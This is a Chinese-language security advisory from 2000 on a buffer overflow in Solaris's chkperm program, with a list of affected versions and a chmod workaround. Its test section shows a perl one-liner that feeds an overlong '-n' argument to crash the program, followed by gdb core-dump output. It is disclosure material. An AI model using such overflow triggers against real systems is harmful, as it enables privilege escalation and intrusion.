Solaris chkperm 缓冲区溢出漏洞
发布日期:2000-01-07
更新日期:2000-01-07
受影响系统:Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86HW5/98
Sun Solaris 2.6_x86HW3/98
Sun Solaris 2.6_x86
Sun Solaris 2.6HW5/98
Sun Solaris 2.6HW3/98
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1_ppc
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
描述:
Sun的'/usr/vmsys/bin/chkperm '程序中存在一个缓存溢出漏洞,通过向checkperm的'-n'
参数提供一个包含精心设计的可执行代码的字符串,攻击者可以以root身份执行任意命令.
<* 来源: Yong jun Kim (loveyou@securesoft.co.kr) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
Segmentation fault (core dumped)
[hackerslab:/users/loveyou/buf]$ gdb chkperm core
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (sparc-sun-solaris2.5.1),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxx'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0 0xef73ea68 in nvmatch ()
建议:
临时解决办法:
chmod 400 /usr/vmsys/bin/chkperm
浏览次数:6958
严重程度:0(网友投票)